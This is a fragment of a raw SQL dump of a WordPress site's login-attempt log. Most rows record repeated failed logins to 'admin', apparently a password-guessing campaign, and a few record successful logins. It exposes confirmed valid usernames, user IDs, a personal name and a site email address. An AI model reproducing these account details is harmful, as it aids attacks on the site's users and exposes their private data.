Gut Guru',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0'),(1129,4030,1694745209.207328,1,'loginFailInvalidUsername','Biljana Toft',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0'),(1130,4031,1694745708.102798,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0>f','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1131,4035,1694746405.819596,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0gc','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1132,4038,1694746738.258660,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0gc','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1133,4057,1694751366.820695,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0K','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1134,4064,1694752624.179130,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘(','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1135,4096,1694758568.332999,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0@*;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1136,4100,1694759215.907174,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0@*;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1137,4103,1694759778.497303,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0»','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1138,4118,1694763697.827065,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0`','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1139,4141,1694765815.851100,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0%xS','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1140,4166,1694771213.056910,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0D#|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1141,4166,1694771213.076792,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0D#|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1142,4189,1694775702.511087,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0t','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1143,4190,1694776024.525592,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 u','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'),(1144,4198,1694778562.046203,1,'loginFailValidUsername','sara',2,' A \0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(1145,4198,1694778562.059134,1,'loginFailValidUsername','sara',2,' A \0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(1146,4202,1694779050.805034,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1147,4215,1694781400.551254,1,'loginFailInvalidUsername','wadminw',0,'&\0/\0\0\0\0S4','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0'),(1148,4265,1694794342.631764,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1149,4274,1694797329.303813,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0?G3','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1150,4275,1694798860.879431,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0&','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1151,4278,1694800563.702510,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0*','Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/96.0.4664.116 Mobile/15E148 Safari/604.1'),(1152,4281,1694801523.253764,1,'loginFailInvalidUsername','info@tummyrevolution.com',0,'\0\0\0\0\0\0\0\0\0\0sL','Mozilla/5.0 (Linux; Android 10; 5007Z) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(1153,4282,1694801964.570719,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Linux; Android 11; SM-A515U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(1154,4295,1694806617.057960,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0:/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1155,4296,1694806655.987646,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0:/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1156,4331,1694812433.838582,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0@*+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1157,4365,1694818408.503061,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0%.uZ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1158,4366,1694819253.466286,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Kݣ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1159,4366,1694819253.478213,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Kݣ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1160,4383,1694820727.322842,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0ٗb','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1161,4397,1694824968.644261,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0<','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1162,4399,1694825543.206725,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0t','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1163,4401,1694826825.484658,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0t','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1164,4409,1694828274.337358,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0j','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1165,4411,1694829220.984746,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Kk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1166,4442,1694840271.207162,1,'loginFailInvalidUsername','info@tummyrevolution.com',0,'\0\0\0\0\0\0\0\0\0\0./u\n','Mozilla/5.0 (Linux; Android 11; SM-A526U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36'),(1167,4443,1694840893.795310,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0$o;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1168,4464,1694847178.268150,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1169,4472,1694848989.991128,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0M','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1170,4475,1694850012.007132,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0>|','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0'),(1171,4485,1694852122.484869,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Y3','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1172,4527,1694862409.883309,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0tԔ','Mozilla/5.0 (iPad; CPU OS 14_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1'),(1173,4528,1694862551.644625,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0~s','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1174,4529,1694862631.608386,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0'),(1175,4533,1694863540.575476,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0fe','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36'),(1176,4546,1694865552.702122,0,'loginOK','admin',1,'\0\0\0\0\0\0\0\0\0\0A','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(1177,4551,1694867028.130195,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0>f','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1178,4553,1694867561.211399,1,'loginFailInvalidUsername','info@tummyrevolution.com',0,'\0\0\0\0\0\0\0\0\0\0˽','Mozilla/5.0 (Linux; Android 11; WTCELERO5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(1179,4555,1694868480.702060,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1180,4578,1694875984.974328,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0K','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1181,4584,1694879899.753941,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1182,4591,1694882885.031338,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘c','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1183,4600,1694885948.755810,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0[֩E','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1184,4611,1694889193.661243,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0K֣','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1185,4704,1694894901.973950,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0hZ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1186,4709,1694895831.432898,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0%','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1187,4721,1694898214.867979,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1188,4739,1694906292.494251,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0K','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1189,4749,1694910541.006475,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1190,4751,1694911522.629637,1,'loginFailInvalidUsername','info@tummyrevolution.com',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Linux; Android 10; Nokia C5 Endi) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.105 Mobile Safari/537.36'),(1191,4756,1694912921.344049,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0u','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1192,4757,1694913831.913752,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1193,4763,1694917105.613849,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1194,4764,1694917105.795235,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1195,4764,1694917105.804510,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1196,4767,1694917866.057610,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0\0W\r','Mozilla/5.0 (Linux; Android 12; SM-G998U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(1197,4769,1694918737.461262,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0f+W','Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-S367VL) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/14.2 Chrome/87.0.4280.141 Mobile Safari/537.36'),(1198,4777,1694921600.668072,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1199,4806,1694932721.620301,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1200,4829,1694937265.465485,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘e','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1201,4854,1694939109.033004,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0ϴr','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0'),(1202,4872,1694946929.109063,1,'loginFailInvalidUsername','wordcamp',0,'\0\0\0\0\0\0\0\0\0\0-','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36'),(1203,4873,1694946932.126601,1,'loginFailInvalidUsername','server',0,'\0\0\0\0\0\0\0\0\0\0~z','Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(1204,4875,1694946942.782924,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0g$','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(1205,4876,1694946948.420772,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'),(1206,4877,1694946949.162908,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0QG','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'),(1207,4878,1694946952.354733,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0s','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0'),(1208,4879,1694946952.503096,1,'loginFailInvalidUsername','yanz',0,'\0\0\0\0\0\0\0\0\0\0+Ʊ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36'),(1209,4880,1694946955.806290,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0;a','Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(1210,4881,1694946958.922954,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0*`+ ','Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0'),(1211,4882,1694946964.757630,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0B^}','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0'),(1212,4898,1694955330.189418,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0BF','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(1213,4908,1694959755.275777,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘#','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1214,4910,1694959857.562396,0,'loginOK','Bibbi',3,' ?S\\)MU','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(1215,4911,1694960114.863179,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘#','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1216,4915,1694961107.635449,1,'loginFailInvalidUsername','dexter',0,'\0\0\0\0\0\0\0\0\0\0^WC','Mozilla/5.0 (Linux; Android 10; LM-X420) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(1217,4916,1694961109.240835,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\\̐','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'),(1218,4917,1694961114.067039,1,'loginFailInvalidUsername','enamad',0,'*G\0\0\0\0\0\0\0\0\0\0 ','Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(1219,4918,1694961120.350824,1,'loginFailInvalidUsername','master562',0,'\0\0\0\0\0\0\0\0\0\0j','Mozilla/5.0 (Linux; Android 10; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(1220,4919,1694961122.264214,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0>\n','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36'),(1221,4920,1694961124.133313,1,'loginFailInvalidUsername','username',0,'\0\0\0\0\0\0\0\0\0\0Ɗ','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36'),(1222,4923,1694961131.867790,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\024','Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/91.0.4472.80 Mobile/15E148 Safari/604.1'),(1223,4935,1694965187.519918,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0hZ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1224,4936,1694966653.963857,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1225,4941,1694968797.945270,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\\6','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(1226,4941,1694968797.957685,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\\6','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(1227,4946,1694968824.050923,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0Yk9','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(1228,4947,1694968843.071017,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0@l','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36'),(1229,4953,1694971506.930750,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0t','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1230,4959,1694975080.656372,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0>f','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1231,4960,1694975658.168887,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1232,4960,1694975658.181044,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1233,4967,1694980534.671129,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0^','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0'),(1234,4967,1694980534.687043,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0^','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0'),(1235,4969,1694980546.628899,1,'loginFailInvalidUsername','catmeow',0,'\0\0\0\0\0\0\0\0\0\0~z','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'),(1236,4971,1694980560.307275,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0ϴr','Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0'),(1237,4973,1694980571.975143,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\03OQb','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),(1238,4974,1694980576.494828,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0D','Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0'),(1239,4975,1694980579.500249,1,'loginFailInvalidUsername','testuser',0,'(\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(1240,4976,1694980586.925109,1,'loginFailInvalidUsername','wp_updates',0,'\0\0\0\0\0\0\0\0\0\0\Z','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0'),(1241,4977,1694980587.309874,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\013 -','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0'),(1242,4982,1694982031.287209,1,'loginFailInvalidUsername','info@tummyrevolution.com',0,'\0\0\0\0\0\0\0\0\0\0gT&7','Mozilla/5.0 (Linux; Android 11; SM-G981V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Mobile Safari/537.36'),(1243,4984,1694982940.554049,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0-L','Mozilla/5.0 (Linux; Android 9; Moto Z (2)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile 